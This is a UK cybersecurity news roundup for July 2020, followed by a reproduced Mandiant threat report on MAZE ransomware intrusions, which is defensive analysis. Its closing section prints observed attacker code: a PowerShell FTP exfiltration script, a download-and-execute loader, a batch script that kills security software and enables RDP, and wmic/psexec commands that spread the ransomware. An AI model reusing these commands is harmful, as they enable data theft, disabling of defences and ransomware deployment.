              5 out of 5: A must-read for anyone with an interest in cybercrime

              Cyber Security Roundup for August 2020

              A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, July 2020.

              The standout hack of July 2020, and possibly of the year, was the takeover of 45 celebrity Twitter accounts, in a bid to scam their millions of followers by requesting Bitcoin in tweets. 
              Twitter confirms internal tools used in bitcoin-promoting attack ...
              Scam Tweet
              The high-profile Twitter accounts compromised included Barack Obama, Elon Musk, Kanye West, Bill Gates, Jeff Bezos, Warren Buffett, Kim Kardashian, and Joe Biden. Around £80,000 of Bitcoin was sent to the scammer's Bitcoin account before Twitter swiftly took action by deleting the scam tweets and blocking every 'blue tick' verified Twitter user from tweeting, including me

              While the Twitter hack and scam dominated media headlines around the world, the attack was not the 'highly sophisticated cyber-attack' as reported by many media outlets, but it was certainly bold and clever. The attackers phoned Twitter administrative staff and blagged (socially engineered) their Twitter privilege account credentials out of them, which in turn gave the attackers access to Twitter's backend administrative system and to any Twitter account they desired. It is understood this Twitter account access was sold by a hacker on the dark web to a scammer in the days before the attack, that scammer(s) orchestrated a near-simultaneous Bitcoin scam tweets to be posted from the high profile accounts. On 31st July, law enforcement authorities charged three men for the attack, with one of the suspects disclosed as a 19-year British man from Bognor Regis.

              There was a very serious critical Windows vulnerability disclosed as part the July 2020 Microsoft 'Patch Tuesday' security update release. Dubbed "SIGRed", it is a 17-year-old Remote Code Execution (RCE) vulnerability in Windows Domain Name System (DNS), a component commonly present in Microsoft Windows Server 2008, 2012, 2012R2, 2016 and 2019. Disclosed as CVE-2020-1350 it was given the highest possible CVSS score of 10.0, which basically means the vulnerability is “easy to attack” and “likely to be exploited”, although Microsoft said they hadn't seen any evidence of its exploitation at the time of their patch release.

              Given SIGRed is a wormable vulnerability, it makes it particularly dangerous, as wormable malware could exploit the vulnerability to rapidly spread itself over flat networks without any user interaction, as per the WannaCry attack on the NHS and other large organisations. Secondly, it could be used to exploit privilege level accounts (i.e. admin accounts found on Servers).  The Microsoft CVE-2020-1350 vulnerability can be mitigated on effected systems by either applying the Microsoft Windows DNS Server Microsoft released patch (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350 or by applying a Registry Workaround (https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability)

              At least 10 universities in the UK had student data stolen after hackers attacked Blackbaud, an education-focused cloud service provider. UK universities impacted included York, Loughborough, Leeds, London, Reading, Exeter and Oxford. According to the BBC News website, Blackbaud said "In May of 2020, we discovered and stopped a ransomware attack. Prior to our locking the cyber-criminal out, the cyber-criminal removed a copy of a subset of data from our self-hosted environment."

              As expected, the UK Government ordered UK mobile network operators to remove all Huawei 5G equipment by 2027, and banning their purchase of Huawei 5G network equipment after 31st December 2020.  Digital Secretary Oliver Dowden said it follows sanctions imposed by the United States, which claims the Chinese firm poses a national security threat, which Huawei continues to resolutely deny. The ban is expected to delay the UK's 5G rollout by a year. "This has not been an easy decision, but it is the right one for the UK telecoms networks, for our national security and our economy, both now and indeed in the long run," he said. 
              In some media quarters, it was suggested the UK u-turn on Huawei could lead to cyberattack repercussions after Reuter's said its sources confirmed China was behind cyberattacks on Australia's critical national infrastructure and government institutions following their trade dispute with China.

              Russian Hacking Group (APT 29) was jointly accused of targeting the theft of coronavirus vaccine research by the UK NCSC, the Canadian Communication Security Establishment (CSE), United States Department for Homeland Security (DHS), Cyber-security Infrastructure Security Agency (CISA) and the US National Security Agency (NSA). The UK's National Cyber Security Centre (NCSC) said the hackers "almost certainly" operated as "part of Russian intelligence services". It did not specify which research organisations had been targeted, or whether any coronavirus vaccine research data was taken, but it did say vaccine research was not hindered by the hackers. Russia's ambassador to the UK has rejected allegations, "I don't believe in this story at all, there is no sense in it," Andrei Kelin told the BBC's Andrew Marr Show. While Foreign Secretary Dominic Raab said it is "very clear Russia did this", adding that it is important to call out this "pariah-type behaviour". 

              UK sport said hackers tried to steal a £1 million club transfer fee and froze turnstiles at a football game. Cybercriminals hacked a Premier League club managing director's email account during a player transfer negotiation, the million-pound theft was only thwarted by a last-minute intervention by a bank.  Another English football club was targeted by a ransomware attack which stopped its turnstiles and CCTV systems from working, which nearly resulted in a football match being postponed. Common tactics used by hackers to attack football clubs include compromising emails, cyber-enabled fraud and ransomware to shutting down digital systems. For further information on this subject, see my extensive blog post on football club hacking, The Billion Pound Manchester City Hack.

              Smartwatch maker Garmin, had their website, mobile app and customer service call centres taken down by ransomware on 23rd July 2020. Reports suggest the fitness brand had been hit by the WastedLocker ransomware strain, which is said to have been developed by individuals linked to a Russia-based hacking group called 'Evil Corp'.  According to Bleeping Computer, Garmin paid $10 million to cybercriminals to receive decryption keys for the malware on 24th or 25th July 2020.

              Yet another big data exposure caused by a misconfigured AWS S3 bucket was found by security researchers, one million files of Fitness Brand 'V Shred' was discovered exposed to the world, including the personal data of 99,000 V Shred customers. Interestingly V Shred defended the researcher findings by claiming it was necessary for user files to be publicly available and denied that any PII data had been exposed.

              BLOG

              NEWS
              VULNERABILITIES AND SECURITY UPDATES
              AWARENESS, EDUCATION AND THREAT INTELLIGENCE

              Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents

              Targeted ransomware incidents have brought a threat of disruptive and destructive attacks to organizations across industries and geographies. FireEye Mandiant Threat Intelligence has previously documented this threat in our investigations of trends across ransomware incidents, FIN6 activity, implications for OT networks, and other aspects of post-compromise ransomware deployment. Since November 2019, we’ve seen the MAZE ransomware being used in attacks that combine targeted ransomware use, public exposure of victim data, and an affiliate model.

              Malicious actors have been actively deploying MAZE ransomware since at least May 2019. The ransomware was initially distributed via spam emails and exploit kits before later shifting to being deployed post-compromise. Multiple actors are involved in MAZE ransomware operations, based on our observations of alleged users in underground forums and distinct tactics, techniques, and procedures across Mandiant incident response engagements. Actors behind MAZE also maintain a public-facing website where they post data stolen from victims who refuse to pay an extortion fee.

              The combination of these two damaging intrusion outcomes—dumping sensitive data and disrupting enterprise networks—with a criminal service makes MAZE a notable threat to many organizations. This blog post is based on information derived from numerous Mandiant incident response engagements and our own research into the MAZE ecosystem and operations.

              Mandiant Threat Intelligence will be available to answer questions on the MAZE ransomware threat in a May 21 webinar.

              Victimology

              We are aware of more than 100 alleged MAZE victims reported by various media outlets and on the MAZE website since November 2019. These organizations have been primarily based in North America, although victims spanned nearly every geographical region. Nearly every industry sector including manufacturing, legal, financial services, construction, healthcare, technology, retail, and government has been impacted demonstrating that indiscriminate nature of these operations (Figure 1).


              Figure 1: Geographical and industry distribution of alleged MAZE victims

              Multiple Actors Involved in MAZE Ransomware Operations Identified

              Mandiant identified multiple Russian-speaking actors who claimed to use MAZE ransomware and were seeking partners to fulfill different functional roles within their teams. Additional information on these actors is available to Mandiant Intelligence subscribers. A panel used to manage victims targeted for MAZE ransomware deployment has a section for affiliate transactions. This activity is consistent with our assessment that MAZE operates under an affiliate model and is not distributed by a single group. Under this business model, ransomware developers will partner with other actors (i.e. affiliates) who are responsible for distributing the malware. In these scenarios, when a victim pays the ransom demand, the ransomware developers receive a commission. Direct affiliates of MAZE ransomware also partner with other actors who perform specific tasks for a percentage of the ransom payment. This includes partners who provide initial access to organizations and pentesters who are responsible for reconnaissance, privilege escalation and lateral movement—each of which who appear to work on a percentage-basis. Notably, in some cases, actors may be hired on a salary basis (vs commission) to perform specific tasks such as determining the victim organization and its annual revenues. This allows for specialization within the cyber criminal ecosystem, ultimately increasing efficiency, while still allowing all parties involved to profit.


              Figure 2: MAZE ransomware panel

              MAZE Initially Distributed via Exploit Kits and Spam Campaigns

              MAZE ransomware was initially distributed directly via exploit kits and spam campaigns through late 2019. For example, in November 2019, Mandiant observed multiple email campaigns delivering Maze ransomware primarily to individuals at organizations in Germany and the United States, although a significant number of emails were also delivered to entities in Canada, Italy, and South Korea. These emails used tax, invoice, and package delivery themes with document attachments or inline links to documents which download and execute Maze ransomware.

              On November 6 and 7, a Maze campaign targeting Germany delivered macro-laden documents using the subject lines “Wichtige informationen uber Steuerruckerstattung” and “1&1 Internet AG - Ihre Rechnung 19340003422 vom 07.11.19” (Figure 3). Recipients included individuals at organizations in a wide range of industries, with the Financial Services, Healthcare, and Manufacturing sectors being targeted most frequently. These emails were sent using a number of malicious domains created with the registrant address gladkoff1991@yandex.ru.


              Figure 3: German-language lure

              On November 8, a campaign delivered Maze primarily to Financial Services and Insurance organizations located in the United states. These emails originated from a compromised or spoofed account and contained an inline link to download a Maze executable payload.

              On November 18 and 19, a Maze campaign targeted individuals operating in a range of industries in the United States and Canada with macro documents using phone bill and package delivery themes (Figure 4 and Figure 5). These emails used the subjects “Missed package delivery” and "Your AT&T wireless bill is ready to view" and were sent using a number of malicious domains with the registrant address abusereceive@hitler.rocks. Notably, this registrant address was also used to create multiple Italian-language domains towards the end of November 2019.


              Figure 4: AT&T email lure


              Figure 5: Canada Post email lure

              Shift to Post-Compromise Distribution Maximizes Impact

              Actors using MAZE have increasingly shifted to deploying the ransomware post-compromise. This methodology provides an opportunity to infect more hosts within a victim’s environment and exfiltrate data, which is leveraged to apply additional pressure on organizations to pay extortion fees. Notably, in at least some cases, the actors behind these operations charge an additional fee, in addition to the decryption key, for the non-release of stolen data.

              Although the high-level intrusion scenarios preceding the distribution of MAZE ransomware are broadly similar, there have been notable variations across intrusions that suggest attribution to distinct teams. Even within these teams, the cyber criminals appear to be task-oriented meaning that one operator is not responsible for the full lifecycle. The following sections highlight the TTPs seen in a subset of incidents and serve to illustrate the divergence that may occur due to the fact that numerous, disparate actors are involved in different phases of these operations. Notably, the time between initial compromise to encryption has also been widely varied, from weeks to many months.

              Initial Compromise

              There are few clear patterns for intrusion vector across analyzed MAZE ransomware incidents. This is consistent with our observations of multiple actors who use MAZE soliciting partners with network access. The following are a sample of observations from several Mandiant incident response engagements:

              • A user downloaded a malicious resume-themed Microsoft Word document that contained macros which launched an IcedID payload, which was ultimately used to execute an instance of BEACON.
              • An actor logged into an internet-facing system via RDP. The account used to grant initial access was a generic support account. It is unclear how the actor obtained the account's password.
              • An actor exploited a misconfiguration on an Internet-facing system. This access enabled the actor to deploy tools to pivot into the internal network.
              • An actor logged into a Citrix web portal account with a weak password. This authenticated access enabled the actor to launch a Meterpreter payload on an internal system.

              Establish Foothold & Maintain Presence

              The use of legitimate credentials and broad distribution of BEACON across victim environments appear to be consistent approaches used by actors to establish their foothold in victim networks and to maintain presence as they look to meet their ultimate objective of deploying MAZE ransomware. Despite these commonplace behaviors, we have observed an actor create their own domain account to enable latter-stage operations.

              • Across multiple incidents, threat actors deploying MAZE established a foothold in victim environments by installing BEACON payloads on many servers and workstations.
              • Web shells were deployed to an internet-facing system. The system level access granted by these web shells was used to enable initial privilege escalation and the execution of a backdoor.
              • Intrusion operators regularly obtained and maintained access to multiple domain and local system accounts with varying permissions that were used throughout their operations.
              • An actor created a new domain account and added it to the domain administrators group.

              Escalate Privileges

              Although Mandiant has observed multiple cases where MAZE intrusion operators employed Mimikatz to collect credentials to enable privilege escalation, these efforts have also been bolstered in multiple cases via use of Bloodhound, and more manual searches for files containing credentials.

              • Less than two weeks after initial access, the actor downloaded and interacted with an archive named mimi.zip, which contained files corresponding to the credential harvesting tool Mimikatz. In the following days the same mimi.zip archive was identified on two domain controllers in the impacted environment.
              • The actor attempted to find files with the word “password” within the environment. Additionally, several archive files were also created with file names suggestive of credential harvesting activity.
              • The actor attempted to identify hosts running the KeePass password safe software.
              • Across multiple incidents, the Bloodhound utility was used, presumably to assess possible methods of obtaining credentials with domain administrator privileges.
              • Actors primarily used Procdump and Mimikatz to collect credentials used to enable later stages of their intrusion. Notably, both Bloodhound and PingCastle were also used, presumably to enable attackers' efforts to understand the impacted organization's Active Directory configuration. In this case the responsible actors also attempted to exfiltrate collected credentials to multiple different cloud file storage services.

              Reconnaissance

              Mandiant has observed a broad range of approaches to network, host, data, and Active Directory reconnaissance across observed MAZE incidents. The varied tools and approaches across these incidents maybe best highlights the divergent ways in which the responsible actors interact with victim networks.

              • In some intrusions, reconnaissance activity occurred within three days of gaining initial access to the victim network. The responsible actor executed a large number of reconnaissance scripts via Cobalt Strike to collect network, host, filesystem, and domain related information.
              • Multiple built-in Windows commands were used to enable network, account, and host reconnaissance of the impacted environment, though the actors also supplied and used Advanced IP Scanner and Adfind to support this stage of their operations.
              • Preliminary network reconnaissance has been conducted using a batch script named '2.bat' which contained a series of nslookup commands. The output of this script was copied into a file named '2.txt'.
              • The actor exfiltrated reconnaissance command output data and documents related to the IT environment to an attacker-controlled FTP server via an encoded PowerShell script.
              • Over a period of several days, an actor conducted reconnaissance activity using Bloodhound, PowerSploit/PowerView (Invoke-ShareFinder), and a reconnaissance script designed to enumerate directories across internal hosts.
              • An actor employed the adfind tool and a batch script to collect information about their network, hosts, domain, and users. The output from this batch script (2adfind.bat) was saved into an archive named 'ad.7z' using an instance of the 7zip archiving utility named 7.exe.
              • An actor used the tool smbtools.exe to assess whether accounts could login to systems across the environment.
              • An actor collected directory listings from file servers across an impacted environment. Evidence of data exfiltration was observed approximately one month later, suggesting that the creation of these directory listings may have been precursor activity, providing the actors with data they may have used to identify sensitive data for future exfiltration.

              Lateral Movement

              Across the majority of MAZE ransomware incidents lateral movement was accomplished via Cobalt Strike BEACON and using previously harvested credentials. Despite this uniformity, some alternative tools and approaches were also observed.

              • Attackers relied heavily on Cobalt Strike BEACON to move laterally across the impacted environment, though they also tunneled RDP using the ngrok utility, and employed tscon to hijack legitimate rdp sessions to enable both lateral movement and privilege escalation.
              • The actor moved laterally throughout some networks leveraging compromised service and user accounts obtained from the system on which they gained their initial foothold. This allowed them to obtain immediate access to additional systems. Stolen credentials were then used to move laterally across the network via RDP and to install BEACON payloads providing the actors with access to nearly one hundred hosts.
              • An actor moved laterally using Metasploit and later deployed a Cobalt Strike payload to a system using a local administrator account.
              • At least one actor attempted to perform lateral movement using EternalBlue in early and late 2019; however, there is no evidence that these attempts were successful.

              Complete Mission

              There was evidence suggesting data exfiltration across most analyzed MAZE ransomware incidents. While malicious actors could monetize stolen data in various way (e.g. sale in an underground forum, fraud), actors employing MAZE are known to threaten the release of stolen data if victim organizations do not pay an extortion fee.

              • An actor has been observed exfiltrating data to FTP servers using a base64-encoded PowerShell script designed to upload any files with .7z file extensions to a predefined FTP server using a hard-coded username and password. This script appears to be a slight variant of a script first posted to Microsoft TechNet in 2013.
              • A different base64-encoded PowerShell command was also used to enable this functionality in a separate incident.
              • Actors deploying MAZE ransomware have also used the utility WinSCP to exfiltrate data to an attacker-controlled FTP server.
              • An actor has been observed employing a file replication utility and copying the stolen data to a cloud file hosting/sharing service.
              • Prior to deploying MAZE ransomware threat actors employed the 7zip utility to archive data from across various corporate file shares. These archives were then exfiltrated to an attacker-controlled server via FTP using the WinSCP utility.

              In addition to data theft, actors deploy MAZE ransomware to encrypt files identified on the victim network. Notably, the aforementioned MAZE panel has an option to specify the date on which ransom demands will double, likely to create a sense of urgency to their demands.

              • Five days after data was exfiltrated from a victim environment the actor copied a MAZE ransomware binary to 15 hosts within the victim environment and successfully executed it on a portion of these systems.
              • Attackers employed batch scripts and a series to txt files containing host names to distribute and execute MAZE ransomware on many servers and workstations across the victim environment.
              • An actor deployed MAZE ransomware to tens of hosts, explicitly logging into each system using a domain administrator account created earlier in the intrusion.
              • Immediately following the exfiltration of sensitive data, the actors began deployment of MAZE ransomware to hosts across the network. In some cases, thousands of hosts were ultimately encrypted. The encryption process proceeded as follows:
                • A batch script named start.bat was used to execute a series of secondary batch scripts with names such as xaa3x.bat or xab3x.bat.
                • Each of these batch scripts contained a series of commands that employed the copy command, WMIC, and PsExec to copy and execute a kill script (windows.bat) and an instance of MAZE ransomware (sss.exe) on hosts across the impacted environment
                • Notably, forensic analysis of the impacted environment revealed MAZE deployment scripts targeting ten times as many hosts as were ultimately encrypted.

              Implications

              Based on our belief that the MAZE ransomware is distributed by multiple actors, we anticipate that the TTPs used throughout incidents associated with this ransomware will continue to vary somewhat, particularly in terms of the initial intrusion vector. For more comprehensive recommendations for addressing ransomware, please refer to our Ransomware Protection and Containment Strategies blog post and the linked white paper.

              Mandiant Security Validation Actions

              Organizations can validate their security controls against more than 20 MAZE-specific actions with Mandiant Security Validation. Please see our Headline Release Content Updates – April 21, 2020 on the Mandiant Security Validation Customer Portal for more information.

              • A100-877 - Active Directory - BloodHound, CollectionMethod All
              • A150-006 - Command and Control - BEACON, Check-in
              • A101-030 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #1
              • A101-031 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #2
              • A101-032 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #3
              • A100-878 - Command and Control - MAZE Ransomware, C2 Check-in
              • A100-887 - Command and Control - MAZE, DNS Query #1
              • A100-888 - Command and Control - MAZE, DNS Query #2
              • A100-889 - Command and Control - MAZE, DNS Query #3
              • A100-890 -  Command and Control - MAZE, DNS Query #4
              • A100-891 - Command and Control - MAZE, DNS Query #5
              • A100-509 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Github PoC
              • A100-339 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Landing Page
              • A101-033 - Exploit Kit Activity - Spelevo Exploit Kit, MAZE C2
              • A100-208 - FTP-based Exfil/Upload of PII Data (Various Compression)
              • A104-488 - Host CLI - Collection, Exfiltration: Active Directory Reconnaissance with SharpHound, CollectionMethod All
              • A104-046 - Host CLI - Collection, Exfiltration: Data from Local Drive using PowerShell
              • A104-090 - Host CLI - Collection, Impact: Creation of a Volume Shadow Copy
              • A104-489 - Host CLI - Collection: Privilege Escalation Check with PowerUp, Invoke-AllChecks
              • A104-037 - Host CLI - Credential Access, Discovery: File & Directory Discovery
              • A104-052 - Host CLI - Credential Access: Mimikatz
              • A104-167 - Host CLI - Credential Access: Mimikatz (2.1.1)
              • A104-490 - Host CLI - Defense Evasion, Discovery: Terminate Processes, Malware Analysis Tools
              • A104-491 - Host CLI - Defense Evasion, Persistence: MAZE, Create Target.lnk
              • A104-500 - Host CLI - Discovery, Defense Evasion: Debugger Detection
              • A104-492 - Host CLI - Discovery, Execution: Antivirus Query with WMI, PowerShell
              • A104-374 - Host CLI - Discovery: Enumerate Active Directory Forests
              • A104-493 - Host CLI - Discovery: Enumerate Network Shares
              • A104-481 - Host CLI - Discovery: Language Query Using PowerShell, Current User
              • A104-482 - Host CLI - Discovery: Language Query Using reg query
              • A104-494 - Host CLI - Discovery: MAZE, Dropping Ransomware Note Burn Directory
              • A104-495 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant
              • A104-496 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant
              • A104-027 - Host CLI - Discovery: Process Discovery
              • A104-028 - Host CLI - Discovery: Process Discovery with PowerShell
              • A104-029 - Host CLI - Discovery: Remote System Discovery
              • A104-153 - Host CLI - Discovery: Security Software Identification with Tasklist
              • A104-083 - Host CLI - Discovery: System Info
              • A104-483 - Host CLI - Exfiltration: PowerShell FTP Upload
              • A104-498 - Host CLI - Impact: MAZE, Desktop Wallpaper Ransomware Message
              • A104-227 - Host CLI - Initial Access, Lateral Movement: Replication Through Removable Media
              • A100-879 - Malicious File Transfer - Adfind.exe, Download
              • A150-046 - Malicious File Transfer - BEACON, Download
              • A100-880 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp Executable Variant
              • A100-881 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp PowerShell Variant
              • A100-882 - Malicious File Transfer - Bloodhound Ingestor Download, PowerShell Variant
              • A101-037 - Malicious File Transfer - MAZE Download, Variant #1
              • A101-038 - Malicious File Transfer - MAZE Download, Variant #2
              • A101-039 - Malicious File Transfer - MAZE Download, Variant #3
              • A101-040 - Malicious File Transfer - MAZE Download, Variant #4
              • A101-041 - Malicious File Transfer - MAZE Download, Variant #5
              • A101-042 - Malicious File Transfer - MAZE Download, Variant #6
              • A101-043 - Malicious File Transfer - MAZE Download, Variant #7
              • A101-044 - Malicious File Transfer - MAZE Download, Variant #8
              • A101-045 - Malicious File Transfer - MAZE Download, Variant #9
              • A101-034 - Malicious File Transfer - MAZE Dropper Download, Variant #1
              • A101-035 - Malicious File Transfer - MAZE Dropper Download, Variant #2
              • A100-885 - Malicious File Transfer - MAZE Dropper Download, Variant #4
              • A101-036 - Malicious File Transfer - MAZE Ransomware, Malicious Macro, PowerShell Script Download
              • A100-284 - Malicious File Transfer - Mimikatz W/ Padding (1MB), Download
              • A100-886 - Malicious File Transfer - Rclone.exe, Download
              • A100-484 - Scanning Activity - Nmap smb-enum-shares, SMB Share Enumeration

              Detecting the Techniques

              Platform

              Signature Name

              MVX (covers multiple FireEye technologies)

              Bale Detection

              FE_Ransomware_Win_MAZE_1

              Endpoint Security

              WMIC SHADOWCOPY DELETE (METHODOLOGY)

              MAZE RANSOMWARE (FAMILY)

              Network Security

              Ransomware.Win.MAZE

              Ransomware.Maze

              Ransomware.Maze

              MITRE ATT&CK Mappings

              Mandiant currently tracks three separate clusters of activity involved in the post-compromise distribution of MAZE ransomware. Future data collection and analysis efforts may reveal additional groups involved in intrusion activity supporting MAZE operations, or may instead allow us to collapse some of these groups into larger clusters. It should also be noted that ‘initial access’ phase techniques have been included in these mappings, though in some cases this access may have been provided by a separate threat actor(s).

              MAZE Group 1 MITRE ATT&CK Mapping

              ATT&CK Tactic Category

              Techniques

              Initial Access

              T1133: External Remote Services

              T1078: Valid Accounts

              Execution

              T1059: Command-Line Interface

              T1086: PowerShell

              T1064: Scripting

              T1035: Service Execution

              Persistence

              T1078: Valid Accounts

              T1050: New Service

              Privilege Escalation

              T1078: Valid Accounts

              Defense Evasion

              T1078: Valid Accounts

              T1036: Masquerading

              T1027: Obfuscated Files or Information

              T1064: Scripting

              Credential Access

              T1110: Brute Force

              T1003: Credential Dumping

              Discovery

              T1087: Account Discovery

              T1482: Domain Trust Discovery

              T1083: File and Directory Discovery

              T1135: Network Share Discovery

              T1069: Permission Groups Discovery

              T1018: Remote System Discovery

              T1016: System Network Configuration Discovery

              Lateral Movement

              T1076: Remote Desktop Protocol

              T1105: Remote File Copy

              Collection

              T1005: Data from Local System

              Command and Control

              T1043: Commonly Used Port

              T1105: Remote File Copy

              T1071: Standard Application Layer Protocol

              Exfiltration

              T1002: Data Compressed

              T1048: Exfiltration Over Alternative Protocol

              Impact

              T1486: Data Encrypted for Impact

              T1489: Service Stop

              MAZE Group 2 MITRE ATT&CK Mapping

              ATT&CK Tactic Category

              Techniques

              Initial Access

              T1193: Spearphishing Attachment

              Execution

              T1059: Command-Line Interface

              T1086: PowerShell

              T1085: Rundll32

              T1064: Scripting

              T1204: User Execution

              T1028: Windows Remote Management

              Persistence

              T1078: Valid Accounts

              T1050: New Service

              T1136: Create Account

              Privilege Escalation

              T1078: Valid Accounts

              T1050: New Service

              Defense Evasion

              T1078: Valid Accounts

              T1140: Deobfuscate/Decode Files or Information

              T1107: File Deletion

              T1036: Masquerading

              Credential Access

              T1003: Credential Dumping

              T1081: Credentials in Files

              T1171: LLMNR/NBT-NS Poisoning

              Discovery

              T1087: Account Discovery

              T1482: Domain Trust Discovery

              T1083: File and Directory Discovery

              T1135: Network Share Discovery

              T1069: Permission Groups Discovery

              T1018: Remote System Discovery

              T1033: System Owner/User Discovery

              Lateral Movement

              T1076: Remote Desktop Protocol

              T1028: Windows Remote Management

              Collection

              T1074: Data Staged

              T1005: Data from Local System

              T1039: Data from Network Shared Drive

              Command and Control

              T1043: Commonly Used Port

              T1219: Remote Access Tools

              T1105: Remote File Copy

              T1071: Standard Application Layer Protocol

              T1032: Standard Cryptographic Protocol

              Exfiltration

              T1020: Automated Exfiltration

              T1002: Data Compressed

              T1048: Exfiltration Over Alternative Protocol

              Impact

              T1486: Data Encrypted for Impact

              MAZE Group 3 MITRE ATT&CK Mapping (FIN6)

              ATT&CK Tactic Category

              Techniques

              Initial Access

              T1133: External Remote Services

              T1078: Valid Accounts

              Execution

              T1059: Command-Line Interface

              T1086: PowerShell

              T1064: Scripting

              T1035: Service Execution

              Persistence

              T1078: Valid Accounts

              T1031: Modify Existing Service

              Privilege Escalation

              T1055: Process Injection

              T1078: Valid Accounts

              Defense Evasion

              T1055: Process Injection

              T1078: Valid Accounts

              T1116: Code Signing

              T1089: Disabling Security Tools

              T1202: Indirect Command Execution

              T1112: Modify Registry

              T1027: Obfuscated Files or Information

              T1108: Redundant Access

              T1064: Scripting

              Credential Access

              T1003: Credential Dumping

              Discovery

              T1087: Account Discovery

              T1482: Domain Trust Discovery

              T1083: File and Directory Discovery

              T1069: Permission Groups Discovery

              T1018: Remote System Discovery

              Lateral Movement

              T1097: Pass the Ticket

              T1076: Remote Desktop Protocol

              T1105: Remote File Copy

              T1077: Windows Admin Shares

              Collection

              T1074: Data Staged

              T1039: Data from Network Shared Drive

              Command and Control

              T1043: Commonly Used Port

              T1219: Remote Access Tools

              T1105: Remote File Copy

              T1071: Standard Application Layer Protocol

              T1032: Standard Cryptographic Protocol

              Exfiltration

              T1002: Data Compressed

              Impact

              T1486: Data Encrypted for Impact

              T1490: Inhibit System Recovery

              T1489: Service Stop

              Example Commands Observed in MAZE Ransomware Incidents

              function Enum-UsersFolders($PathEnum)
              {
                  $foldersArr = 'Desktop','Downloads','Documents','AppData/Roaming','AppData/Local'

                  Get-ChildItem -Path $PathEnum'/c$' -ErrorAction SilentlyContinue
                  Get-ChildItem -Path $PathEnum'/c$/Program Files' -ErrorAction SilentlyContinue
                  Get-ChildItem -Path $PathEnum'/c$/Program Files (x86)' -ErrorAction SilentlyContinue

                  foreach($Directory in Get-ChildItem -Path $PathEnum'/c$/Users' -ErrorAction SilentlyContinue) {

                      foreach($SeachDir in $foldersArr) {
                          Get-ChildItem -Path $PathEnum'/c$/Users/'$Directory'/'$SeachDir -ErrorAction SilentlyContinue
                      }
                  }
              }

              PowerShell reconnaissance script used to enumerate directories

              $Dir="C:/Windows/Temp/"
              #ftp server
              $ftp = "ftp://<IP Address>/incoming/"
              $user = "<username>"
              $pass = "<password>"
              $webclient = New-Object System.Net.WebClient
              $webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)
              #list every sql server trace file
              foreach($item in (dir $Dir "*.7z")){
                 "Uploading $item..."
                 $uri = New-Object System.Uri($ftp+$item.Name)
                 $webclient.UploadFile($uri, $item.FullName)
              }

              Decoded FTP upload PowerShell script

              powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); Add-FtpFile -ftpFilePath "ftp://<IP  Address>/cobalt_uploads/<file name>" -localFile "<local file path>\ <file name> " -userName "<username>" -password "<password>"

              Decoded FTP upload PowerShell script

              […]
              echo 7
              echo 7
              taskkill /im csrss_tc.exe /f
              taskkill /im kwsprod.exe /f
              taskkill /im avkwctl.exe /f
              taskkill /im rnav.exe /f
              taskkill /im crssvc.exe /f
              sc config CSAuth start= disabled
              taskkill /im vsserv.exe /f
              taskkill /im ppmcativedetection.exe /f
              […]
              taskkill /im sahookmain.exe /f
              taskkill /im mcinfo.exe /f
              reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
              netsh advfirewall firewall set rule group="remote desktop" new enable=Ye
              c:\windows\temp\sss.exe

              Excerpt from windows.bat kill script

              start copy sss.exe \\<internal IP>\c$\windows\temp\
              start copy sss.exe \\<internal IP>\c$\windows\temp\

              start copy windows.bat \\<internal IP>\c$\windows\temp\
              start copy windows.bat \\<internal IP>\c$\windows\temp\

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

              start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

              start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

              start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

              start psexec.exe \\<internal IP> -u < DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

              Example commands from MAZE distribution scripts

              @echo off
              del done.txt
              del offline.txt
              rem Loop thru list of computer names in file specified on command-line
              for /f %%i in (%1) do call :check_machine %%i
              goto end
              :check_machine
              rem Check to see if machine is up.
              ping -n 1 %1|Find "TTL=" >NUL 2>NUL
